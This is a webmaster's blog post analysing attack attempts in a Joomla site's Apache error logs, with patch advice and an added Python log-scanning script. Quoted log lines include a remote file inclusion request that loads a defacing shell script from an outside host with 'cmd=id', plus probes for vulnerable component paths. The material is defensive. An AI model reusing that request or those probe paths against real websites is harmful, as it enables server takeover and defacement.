
Hackers are using scripts to hack my page…

I have already tried to reduce the attack surface of my homepage by removing all unneeded components, modules and mambots, but here is what I found in the log files.

Hackers trying remote code injection

The following line was found more than once in the Apache error.log:

[Thu Aug 17 17:29:05 2006] [error] [client 81.214.151.223] Invalid URI in request GET administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[http://recon.reschat.dk/images/gallery/tool25.txt?cmd=id HTTP/1.0

Remember: you should update the following components to their latest version as soon as possible:

  • com_securityimages: versions < 3.0.5 are affected, use at least a version > 3.0.6
  • com_hashcash: versions < 1.2.1 are affected, use at least a version > 1.2.2
  • com_bayesiannaivefilter was developed but never released as a component; it is still available in the Joomla forge developer tree.

This attack tries to execute a script located at http://recon.reschat.dk/images/gallery/tool25.txt. If you go there, you will find that the script is readable and contains a header:

Defacing Tool 2.0 by xxxxxx

"Defacing Tool 2.0 by xxxxxxx" is a suite of PHP-based scripts that lets the attacker send commands to the server, primarily with the intent of defacing websites.

Solutions:

  1. For com_bayesiannaivefilter: sorry, but I do not have this plugin, nor has it ever been released in the wild. For com_securityimages or com_hashcash, just upgrade!
  2. If you manage a web host that you are certain does not need remote includes, you can disable that functionality in your php.ini configuration file (for example /etc/php.ini) by setting the following variable: allow_url_fopen = Off

Hackers trying to access well known PHP files

Each of the lines below appeared more than 500 times in a single day:

[Fri Aug 11 19:11:50 2006] [error] [client 221.87.148.77] Directory index forbidden by rule: /var/www/vhosts/waltercedric.com/httpdocs/components/com_htmlarea3_xtd-c/popups/ImageManager/
[Mon Jul 31 13:07:12 2006] [error] [client 85.108.201.139] user  not found: /administrator/components/com_bayesiannaivefilter/lang.php
[Mon Jul 31 13:07:19 2006] [error] [client 85.108.201.139] user admin: authentication failure for "/administrator/components/com_bayesiannaivefilter/lang.php": Password Mismatch
[Sat Feb 18 21:44:47 2006] [error] [client 80.218.20.20] File does not exist: /var/www/vhosts/waltercedric.com/httpdocs/var, referer: http://www.waltercedric.com/administrator/index2.php?option=com_zoom&Itemid=&page=upload&formtype=scan

Hackers trying to access files that do not exist

  • /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/com_hashcash
  • wiki/administrator/
  • [Tue Aug 01 21:09:46 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_uhp/uhp_config.php
  • [Tue Aug 01 20:43:03 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_colophon/admin.colophon.php
  • [Mon Jul 31 20:11:25 2006] [error] [client 88.233.220.125] user  not found: /administrator/components/com_mgm/help.mgm.php

These look like automated programs that brute-force a rule-based list of paths, searching for well-known vulnerabilities.

Some strange attempts…

[Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/MSOffice
[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/_vti_bin
[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/MSOffice
[Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/_vti_bin
[Mon Jul 31 16:58:44 2006] [error] [client 207.46.98.40] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/demo/httpdocs/function.fopen
[Fri Jul 28 23:04:35 2006] [error] [client 85.103.107.26] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/path=attacker-example.com
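As an added example (not code from the original post), here is a small Python script that applies the checks described in the three sections above to Apache error_log lines: it flags requests where a query parameter carries an absolute URL (the remote-include attempt seen in the com_bayesiannaivefilter line), counts the distinct non-existent paths each client asked for so that scanners walking a list of component names stand out, and tallies failed admin logins. The sample log is constructed from the excerpts quoted above; the threshold of three distinct missing paths is an assumption chosen for illustration, not a value from the post.

```python
import re
from collections import defaultdict

# Apache 2.0/2.2 error_log layout: [timestamp] [level] [client IP] message
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] \[client (?P<ip>[\d.]+)\] (?P<msg>.*)$"
)

# A query parameter whose value is an absolute URL is the remote-include
# pattern (e.g. mosConfig_absolute_path=http://...). The optional "[" tolerates
# the stray bracket present in the logged request.
RFI_RE = re.compile(r"[?&]([A-Za-z0-9_]+)=\[?(https?://[^\s&\"]+)")

# Messages that mean "the client asked for something that is not there".
PROBE_PREFIXES = (
    "File does not exist: ",
    "user  not found: ",  # two spaces, as Apache's mod_auth writes it
    "Directory index forbidden by rule: ",
)

# Constructed sample, adapted from the log excerpts quoted in the post.
SAMPLE_LOG = """\
[Thu Aug 17 17:29:05 2006] [error] [client 81.214.151.223] Invalid URI in request GET administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=[http://recon.reschat.dk/images/gallery/tool25.txt?cmd=id HTTP/1.0
[Mon Jul 31 13:07:12 2006] [error] [client 85.108.201.139] user  not found: /administrator/components/com_bayesiannaivefilter/lang.php
[Mon Jul 31 13:07:19 2006] [error] [client 85.108.201.139] user admin: authentication failure for "/administrator/components/com_bayesiannaivefilter/lang.php": Password Mismatch
[Tue Aug 01 21:09:46 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_uhp/uhp_config.php
[Tue Aug 01 20:43:03 2006] [error] [client 200.120.37.70] user  not found: /administrator/components/com_colophon/admin.colophon.php
[Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/MSOffice
[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/_vti_bin
[Tue Aug 01 18:48:47 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/forums/httpdocs/MSOffice
[Tue Aug 01 18:49:11 2006] [error] [client 213.84.64.236] File does not exist: /var/www/vhosts/waltercedric.com/subdomains/wiki/httpdocs/_vti_bin
[Sat Feb 18 21:44:47 2006] [error] [client 80.218.20.20] File does not exist: /var/www/vhosts/waltercedric.com/httpdocs/var, referer: http://www.waltercedric.com/administrator/index2.php?option=com_zoom&Itemid=&page=upload&formtype=scan
"""


def parse_log(text):
    """Parse every well-formed error_log line into a dict of its fields."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def find_remote_includes(entries):
    """Entries whose request carries a URL-valued query parameter."""
    hits = []
    for e in entries:
        m = RFI_RE.search(e["msg"])
        if m:
            hits.append({"ip": e["ip"], "param": m.group(1), "url": m.group(2)})
    return hits


def probe_paths(entries):
    """Map client IP -> set of distinct missing paths it requested."""
    paths = defaultdict(set)
    for e in entries:
        for prefix in PROBE_PREFIXES:
            if e["msg"].startswith(prefix):
                # Drop the ", referer: ..." suffix Apache appends when present.
                path = e["msg"][len(prefix):].split(", referer:")[0]
                paths[e["ip"]].add(path)
                break
    return paths


def auth_failures(entries):
    """Map client IP -> number of failed HTTP auth attempts (e.g. Password Mismatch)."""
    counts = defaultdict(int)
    for e in entries:
        if "authentication failure for" in e["msg"]:
            counts[e["ip"]] += 1
    return dict(counts)


def flag_scanners(entries, threshold=3):
    """Clients that asked for at least `threshold` distinct missing paths.

    The default threshold is an assumption for this example; tune it to the
    site's normal 404 noise.
    """
    return sorted(ip for ip, p in probe_paths(entries).items() if len(p) >= threshold)


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    for h in find_remote_includes(entries):
        print(f"remote include attempt from {h['ip']}: {h['param']}={h['url']}")
    for ip in flag_scanners(entries):
        print(f"path scanner: {ip} ({len(probe_paths(entries)[ip])} distinct missing paths)")
    for ip, n in auth_failures(entries).items():
        print(f"failed admin logins from {ip}: {n}")
```

Run against a real error_log by replacing SAMPLE_LOG with the file's contents; on the sample it reports the remote-include attempt from 81.214.151.223, flags 213.84.64.236 as a path scanner (four distinct missing paths) and counts one failed admin login from 85.108.201.139.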

About The Author

I worked with various insurance companies across Switzerland on online applications handling billion premium volumes. I love to continuously spark my creativity in many different and challenging open-source projects fueled by my great passion for innovation and blockchain technology. In my technical role as a senior software engineer and Blockchain consultant, I help to define and implement innovative solutions in the scope of both blockchain and traditional products, solutions, and services. I can support the full spectrum of software development activities, starting from analyzing ideas and business cases and up to the production deployment of the solutions. I'm the Founder and CEO of Disruptr GmbH.